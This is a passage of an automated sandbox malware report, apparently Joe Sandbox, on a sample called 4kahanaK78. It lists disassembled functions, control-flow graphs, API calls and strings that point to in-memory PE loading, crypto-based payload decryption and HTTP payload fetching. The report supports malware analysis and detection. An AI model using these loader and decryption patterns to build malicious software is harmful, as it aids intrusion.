35069->35070 35073 d897c6 35070->35073 35078 d897e1 35073->35078 35074 d897ea CreateToolhelp32Snapshot 35075 d89806 Module32First 35074->35075 35074->35078 35076 d8903e 35075->35076 35077 d89815 35075->35077 35080 d89485 35077->35080 35078->35074 35078->35075 35081 d894b0 35080->35081 35082 d894c1 VirtualAlloc 35081->35082 35083 d894f9 35081->35083 35082->35083

                                    Executed Functions

                                    Function 00402C70 Relevance: 35.5, APIs: 11, Strings: 9, Instructions: 504COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 402c70-402c92 1 402c94-402cbb SetLastError call 402920 call 408ec2 0->1 2 402cbc-402cc4 0->2 4 402cf1-402cff 2->4 5 402cc6 2->5 6 402d01-402d28 SetLastError call 402920 call 408ec2 4->6 7 402d29-402d36 4->7 9 402ccb-402cf0 call 402920 SetLastError call 408ec2 5->9 11 402d38-402d3d 7->11 12 402d3f-402d48 7->12 11->9 17 402d54-402d5a 12->17 18 402d4a-402d4f 12->18 21 402d66-402d73 17->21 22 402d5c-402d61 17->22 18->9 26 402d94-402db7 GetNativeSystemInfo 21->26 27 402d75 21->27 22->9 28 402dc3-402ddb VirtualAlloc 26->28 29 402db9-402dbe 26->29 30 402d77-402d92 27->30 31 402e03-402e1e GetProcessHeap HeapAlloc 28->31 32 402ddd-402ded VirtualAlloc 28->32 29->9 30->26 30->30 34 402e20-402e2d VirtualFree 31->34 35 402e34-402e7a 31->35 32->31 33 402def-402dfc call 402920 32->33 33->31 34->35 37 402e7c-402e7e SetLastError 35->37 38 402e9e-402ee6 VirtualAlloc call 40a3e0 35->38 41 402e84-402e9d call 4033d0 call 408ec2 37->41 44 402eec-402eef 38->44 45 402f9f-402fa8 38->45 48 402ef0-402ef5 44->48 49 40302d 45->49 50 402fae-402fb5 45->50 53 402ef7-402f03 48->53 54 402f38-402f40 48->54 52 403032-40303e call 402a80 49->52 55 402fb7-402fb9 50->55 56 402fbb-402fcd 50->56 52->41 66 403044-403067 52->66 58 402f84-402f96 53->58 59 402f05-402f1f 53->59 54->37 61 402f46-402f59 call 402bf0 54->61 55->52 56->49 60 402fcf 56->60 58->48 63 402f9c 58->63 59->41 74 402f25-402f36 call 40aa10 59->74 64 402fd0-402fe5 60->64 65 402f5b-402f60 61->65 63->45 68 402fe7-402fea 64->68 69 40301e-403028 64->69 65->41 70 402f66-402f7b call 40a3e0 65->70 72 403069-40306e 66->72 73 40307c-40309c 66->73 75 402ff0-403001 68->75 69->64 71 40302a 69->71 92 402f7e-402f81 70->92 71->49 79 403070-403073 72->79 80 403075-403077 72->80 82 4030a2-4030a8 73->82 83 403165-403171 call 402950 73->83 74->92 76 403003-40300b 75->76 77 40300e-40301c 75->77 76->77 77->69 77->75 79->73 80->73 86 403079 80->86 88 4030b0-4030c9 82->88 91 403176-403178 83->91 86->73 89 4030e3-4030e6 88->89 90 4030cb-4030ce 88->90 96 403123-40312f 89->96 97 4030e8-4030ef 89->97 93 4030d0-4030d3 90->93 94 4030d5-4030d8 90->94 91->41 95 40317e-40318a 91->95 92->58 98 4030dd-4030e0 93->98 94->89 99 4030da 94->99 100 4031b3-4031b8 95->100 101 40318c-403195 95->101 104 403131 96->104 105 403137-403140 96->105 102 403120 97->102 103 4030f1-4030f6 call 402950 97->103 98->89 99->98 108 40320a-403223 call 408ec2 100->108 109 4031ba-4031c3 100->109 101->100 106 403197-40319b 101->106 102->96 112 4030fb-4030fd 103->112 104->105 110 403143-40315f 105->110 106->100 111 40319d 106->111 114 4031f4-403209 call 408ec2 109->114 115 4031c5-4031ce 109->115 110->83 110->88 117 4031a0-4031af 111->117 112->41 118 403103-40311e 112->118 122 4031d0 115->122 123 4031da-4031f3 call 408ec2 115->123 126 4031b1 117->126 118->110 122->123 126->100
                                    APIs
                                    • SetLastError.KERNEL32(0000000D), ref: 00402C96
                                    • SetLastError.KERNEL32(000000C1), ref: 00402CD8
                                    Strings
                                    • DOS header size is not valid!, xrefs: 00402D09
                                    • DOS header is not valid!, xrefs: 00402CC6
                                    • alignedImageSize != AlignValueUp!, xrefs: 00402DB9
                                    • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402D4A
                                    • ERROR_OUTOFMEMORY!, xrefs: 00402DEF
                                    • Size is not valid!, xrefs: 00402C9C
                                    • Section alignment invalid!, xrefs: 00402D5C
                                    • @, xrefs: 00402C8F
                                    • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402D38
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID: @$DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                                    • API String ID: 1452528299-393758929
                                    • Opcode ID: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                    • Instruction ID: 68209fb506ae9b68e90255ee0055c9910cae7d9580854ddc7816d62818b51dcc
                                    • Opcode Fuzzy Hash: a7ee295ea28172196232d939963434d58e5a2b4f3baf6ecdb48b764af0884dbc
                                    • Instruction Fuzzy Hash: 3E129C71B002159BDB14CF98D985BAEBBB5BF48304F14416AE809BB3C1D7B8ED41CB98
                                    Function 004034C0 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 179 4034c0-403548 CryptAcquireContextW 180 40360a-403620 GetLastError CryptReleaseContext 179->180 181 40354e-40356c CryptCreateHash 179->181 182 403754-40375a 180->182 181->180 183 403572-403585 181->183 184 403784-4037a1 call 408ec2 182->184 185 40375c-403768 182->185 186 403588-40358d 183->186 187 40377a-403781 call 409027 185->187 188 40376a-403778 185->188 186->186 189 40358f-4035d6 call 409035 call 40e46b CryptHashData 186->189 187->184 188->187 191 4037a2-4037b5 call 40c26f 188->191 203 4035e6-403608 CryptDeriveKey 189->203 204 4035d8-4035e1 GetLastError 189->204 201 4037b7-4037be 191->201 202 4037c8 191->202 201->202 207 4037c0-4037c4 201->207 203->180 206 403625-403626 call 40e2bd 203->206 204->182 209 40362b-403677 call 40a3e0 call 409035 206->209 207->202 214 403748-40374e CryptDestroyKey 209->214 215 40367d-40368c 209->215 214->182 216 403692-40369b 215->216 217 4036a9-4036e4 call 40a3e0 CryptDecrypt 216->217 218 40369d-40369f 216->218 217->214 221 4036e6-403711 call 40a3e0 217->221 218->217 221->214 224 403713-403742 221->224 224->214 224->216
                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,7F5C6DB0), ref: 00403540
                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403564
                                    • _mbstowcs.LIBCMT ref: 004035B7
                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004035CE
                                    • GetLastError.KERNEL32 ref: 004035D8
                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403600
                                    • GetLastError.KERNEL32 ref: 0040360A
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040361A
                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004036DC
                                    • CryptDestroyKey.ADVAPI32(?), ref: 0040374E
                                    Strings
                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040351C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                    • API String ID: 3642901890-63410773
                                    • Opcode ID: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                    • Instruction ID: 057eae88fc1e8b42dc2b0b13f8460ebd140b44a30a8541124d595f3772e2d34e
                                    • Opcode Fuzzy Hash: b9aca645bf8e0e24d310163d35795d59eee685dab11f25e4e54b3c0023d62c89
                                    • Instruction Fuzzy Hash: 4D8182B1A00218AFEF248F25CC45B9ABBB9EF45304F1081BAE50DE7291DB359E858F55
                                    Function 00402950 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 245 402950-402967 246 4029a9-4029bd call 408ec2 245->246 247 402969-402972 245->247 249 402974-402979 247->249 250 4029be-402a00 VirtualProtect 247->250 249->246 253 40297b-402980 249->253 250->246 252 402a02-402a24 GetLastError FormatMessageA 250->252 256 402a27-402a2c 252->256 254 402982-40298a 253->254 255 402996-4029a3 call 402c10 253->255 254->255 257 40298c-402994 254->257 260 4029a5 255->260 256->256 258 402a2e-402a7a LocalAlloc call 4028e0 OutputDebugStringA LocalFree * 2 call 408ec2 256->258 257->255 259 4029a8 257->259 259->246 260->259
                                    APIs
                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 004029F8
                                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402A0D
                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402A1B
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402A36
                                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402A55
                                    • LocalFree.KERNEL32(00000000), ref: 00402A62
                                    • LocalFree.KERNEL32(?), ref: 00402A67
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                    • String ID: %s: %s$Error protecting memory page
                                    • API String ID: 839691724-1484484497
                                    • Opcode ID: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                    • Instruction ID: 2da31f80489fd9465a3e1d2b594a5759e7c0520832ca97f04c55df17c8a78757
                                    • Opcode Fuzzy Hash: 2c46ffc98d029cfadbc5bd6c783c679e7e34e813f473582b7efecdd829900f05
                                    • Instruction Fuzzy Hash: 0831F272B00114AFDB14DF58DC44FAAB7A8FF48304F0541AAE905EB291DA75AD12CA88
                                    Function 00401880 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 298networkfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401905
                                    • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401924
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: FileInternet$PointerRead
                                    • String ID: text
                                    • API String ID: 3197321146-999008199
                                    • Opcode ID: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                    • Instruction ID: 86dcce6fdabdf1d76a3839b2d4c7acaf7fb3a9f1032210a7d38a4a94718e3fd4
                                    • Opcode Fuzzy Hash: 87aac4e3b5ff56ab0de5e0ee71ca196cf257f89e2ae9c22cdb46c2756a6c72d5
                                    • Instruction Fuzzy Hash: 7AC16B71A002189FEB25CF24CD85BEAB7B9FF48304F1041ADE509A76A1DB75AE84CF54
                                    Function 00404AC0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 384COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
                                      • Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8
                                    • __Init_thread_footer.LIBCMT ref: 00404C2D
                                      • Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
                                      • Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
                                      • Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                    • String ID: DFEK
                                    • API String ID: 2296764815-757449308
                                    • Opcode ID: f5ea686ae7551739fb09ba2269fdc54c75ff8209f0bf429beda0c7ff0f9ef911
                                    • Instruction ID: a8471f465924a32413f7d6e48ccdb4296a49fee141aba0f40ec0945386ee40bc
                                    • Opcode Fuzzy Hash: f5ea686ae7551739fb09ba2269fdc54c75ff8209f0bf429beda0c7ff0f9ef911
                                    • Instruction Fuzzy Hash: 32F1CFB0D002589BEB24DF24DD4879EBBB1EB41308F1441EAD4183B2D2DB799E84CF99
                                    Function 0040EF0D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 812 40ef0d-40ef1a call 41366f 815 40ef3c-40ef48 call 40ef4f ExitProcess 812->815 816 40ef1c-40ef2a GetPEB 812->816 816->815 817 40ef2c-40ef36 GetCurrentProcess TerminateProcess 816->817 817->815
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,?,0040EF0C,00000000,7591DF80,?,00000000,?,004114AD), ref: 0040EF2F
                                    • TerminateProcess.KERNEL32(00000000,?,0040EF0C,00000000,7591DF80,?,00000000,?,004114AD), ref: 0040EF36
                                    • ExitProcess.KERNEL32 ref: 0040EF48
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                    • Instruction ID: d9b2d8b9480fbdfc0f40d30fbcce2ac7d268d3ffe56ae59340c1a79faed9bf6b
                                    • Opcode Fuzzy Hash: 0681eec8a10bae1972cdd76b7596642c5d6b23a8fea5b51096d6af8d336d3898
                                    • Instruction Fuzzy Hash: 48E08C71400108BFCF117F26CC0898A3F28FB10341B004835F804AA232CB39DD92CB58
                                    Function 00D897C6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00D897EE
                                    • Module32First.KERNEL32(00000000,00000224), ref: 00D8980E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3307293303.0000000000D89000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D89000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_d89000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 3833638111-0
                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                    • Instruction ID: 82d5d855f26b0286f04651267cbe68724eb49e85d12306bd4fd9144bd55bb76e
                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                    • Instruction Fuzzy Hash: 9BF062312007116BD7203BB9AC9DA7EB6F8AF89725F180628F686910C0DA70E8454771
                                    Function 00408020 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: emp$mixtwo
                                    • API String ID: 3472027048-2390925073
                                    • Opcode ID: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                    • Instruction ID: 72a2dd17e89226f8ccca0b0bb08db3f26db736a0bfe45ababc36bb360cb4900e
                                    • Opcode Fuzzy Hash: 7c8f0e1ea6e5323602f9bb77927d34118e87d89025315e812fc220ab57e9b21a
                                    • Instruction Fuzzy Hash: 7BF08CB160130457E710BF24ED1B71A3EA4970275CFA006ADDC601F2D2E7FB821A97EA
                                    Function 10001523 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 192networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                    • __cftof.LIBCMT ref: 10001624
                                    • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                    • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                    • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                    • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                    • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                    • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3309607086.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000000.00000002.3309587632.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309627188.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.3309646682.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_10000000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                    • String ID: GET$http://
                                    • API String ID: 1233269984-1632879366
                                    • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                    • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                    • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                    • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0
                                    Function 00401740 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 103networkCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017B7
                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004017DD
                                      • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 004025A3
                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401803
                                    • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401829
                                    Strings
                                    • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004017E1
                                    • GET, xrefs: 00401F81
                                    • text, xrefs: 00401B5C
                                    • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 00401807
                                    • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004017BB
                                    • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401779
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                    • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$text
                                    • API String ID: 2146599340-3782612381
                                    • Opcode ID: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                    • Instruction ID: 9ba0ec624b0ce2a87a65cb7bdca14d25b7083be08071b54b776f69b68f7f070f
                                    • Opcode Fuzzy Hash: 15361f417402fd4ecc7fc6d3c75552e14ddd1825e06757481bbfd3e0326afcfa
                                    • Instruction Fuzzy Hash: 34316171E00108EBDB14DFA9DC85FEEBBB9EB48714F60812AE121771C0C778A644CBA5
                                    Function 04B4003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 266 4b4003c-4b40047 267 4b4004c-4b40263 call 4b40a3f call 4b40e0f call 4b40d90 VirtualAlloc 266->267 268 4b40049 266->268 283 4b40265-4b40289 call 4b40a69 267->283 284 4b4028b-4b40292 267->284 268->267 289 4b402ce-4b403c2 VirtualProtect call 4b40cce call 4b40ce7 283->289 286 4b402a1-4b402b0 284->286 288 4b402b2-4b402cc 286->288 286->289 288->286 295 4b403d1-4b403e0 289->295 296 4b403e2-4b40437 call 4b40ce7 295->296 297 4b40439-4b404b8 VirtualFree 295->297 296->295 299 4b405f4-4b405fe 297->299 300 4b404be-4b404cd 297->300 303 4b40604-4b4060d 299->303 304 4b4077f-4b40789 299->304 302 4b404d3-4b404dd 300->302 302->299 308 4b404e3-4b40505 LoadLibraryA 302->308 303->304 309 4b40613-4b40637 303->309 306 4b407a6-4b407b0 304->306 307 4b4078b-4b407a3 304->307 310 4b407b6-4b407cb 306->310 311 4b4086e-4b408be LoadLibraryA 306->311 307->306 312 4b40517-4b40520 308->312 313 4b40507-4b40515 308->313 314 4b4063e-4b40648 309->314 315 4b407d2-4b407d5 310->315 318 4b408c7-4b408f9 311->318 316 4b40526-4b40547 312->316 313->316 314->304 317 4b4064e-4b4065a 314->317 319 4b40824-4b40833 315->319 320 4b407d7-4b407e0 315->320 321 4b4054d-4b40550 316->321 317->304 322 4b40660-4b4066a 317->322 323 4b40902-4b4091d 318->323 324 4b408fb-4b40901 318->324 330 4b40839-4b4083c 319->330 325 4b407e4-4b40822 320->325 326 4b407e2 320->326 327 4b40556-4b4056b 321->327 328 4b405e0-4b405ef 321->328 329 4b4067a-4b40689 322->329 324->323 325->315 326->319 331 4b4056d 327->331 332 4b4056f-4b4057a 327->332 328->302 333 4b40750-4b4077a 329->333 334 4b4068f-4b406b2 329->334 330->311 335 4b4083e-4b40847 330->335 331->328 341 4b4057c-4b40599 332->341 342 4b4059b-4b405bb 332->342 333->314 336 4b406b4-4b406ed 334->336 337 4b406ef-4b406fc 334->337 338 4b40849 335->338 339 4b4084b-4b4086c 335->339 336->337 343 4b406fe-4b40748 337->343 344 4b4074b 337->344 338->311 339->330 349 4b405bd-4b405db 341->349 342->349 343->344 344->329 349->321
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B4024D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3308616404.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_4b40000_4kahanaK78.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: cess$kernel32.dll
                                    • API String ID: 4275171209-1230238691
                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                    • Instruction ID: aaf139267ef4e5642fbb18c39f388347c894ce93ea4240f5c082b251081cc81f
                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                    • Instruction Fuzzy Hash: EB527974A01229DFDB64CF68C984BACBBB1BF49304F1480D9E94DAB351DB30AA85DF15
                                    Function 00403940 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 462COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetTempPathA.KERNEL32(00000104,?,7F5C6DB0,?,?), ref: 004039AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.3306439694.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.3306439694.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_4kahanaK78.jbxd
                                    Similarity
                                    • API ID: PathTemp
                                    • String ID: FOKD$]DFE
                                    • API String ID: 2920410445-3017404832
                                    • Opcode ID: 27236d4f250ac8372db859e863e52998a7c9ede129ab753eb113f8c947f5c1bf
                                    • Instruction ID: 060d57ff9f4645fb4c9d6c2d7fcf659463d82fb11908da3dea168b2ab6b676f4
                                    • Opcode Fuzzy Hash: 27236d4f250ac8372db859e863e52998a7c9ede129ab753eb113f8c947f5c1bf
                                    • Instruction Fuzzy Hash: F9324DB0D042588EEB24DF14CD4479EBBB5EB51308F1441E9D64C3B292DB796AC8CF99
                                    Function 10001175 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264networkcomfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 525 10001175-100011a6 call 1000e8e7 528 100011a8-100011b0 call 1000270d 525->528 529 100011bf 525->529 532 100011b5-100011bd 528->532 531 100011c5-100011dd InternetSetFilePointer 529->531 533 100011e3-1000121b InternetReadFile 531->533 532->531 534 10001253-1000125a 533->534 535 1000121d-1000124d call 1000270d call 100050e0 call 10002724 533->535 536 10001260-100012a0 call 10003c40 HttpQueryInfoA 534->536 537 1000125c-1000125e 534->537 535->534 543 100012a6-100012d2 CoCreateInstance 536->543 544 1000150a-10001520 call 1000e8a5 536->544 537->533 537->536 543->544 546 100012d8-100012df 543->546 546->544 550 100012e5-10001316 call 1000184b call 10001006 546->550 556 10001318 550->556 557 1000131a-10001351 call 10001c08 call 10001bb9 550->557 556->557 563 10001357-1000135e 557->563 564 100014fe-10001505 557->564 563->564 565 10001364-100013cc call 1000270d 563->565 564->544 569 100013d2-100013e8 565->569 570 100014e6-100014f9 call 10002724 565->570 572 10001486-10001497 569->572 573 100013ee-1000141d call 1000270d 569->573 570->564 574 10001499-1000149b 572->574 575 100014dc-100014e4 572->575 584 1000146e-10001483 call 10002724 573->584 585 1000141f-10001421 573->585 578 100014aa-100014ac 574->578 579 1000149d-100014a8 call 10005926 574->579 575->570 582 100014c0-100014d1 call 10003c40 call 10005926 578->582 583 100014ae-100014be call 100050e0 578->583 595 100014d7 call 1000584c 579->595 582->595 583->575 584->572 586 10001423-10001425 585->586 587 10001434-10001447 call 10003c40 585->587 586->587 592 10001427-10001432 call 100050e0 586->592 604 10001456-1000145c 587->604 605 10001449-10001454 call 10005926 587->605 592->584 595->575 604->584 607 1000145e-10001463 call 10005926 604->607 610 10001469 call 1000584c 605->610 607->610 610->584
                                    APIs
                                    • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                    • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
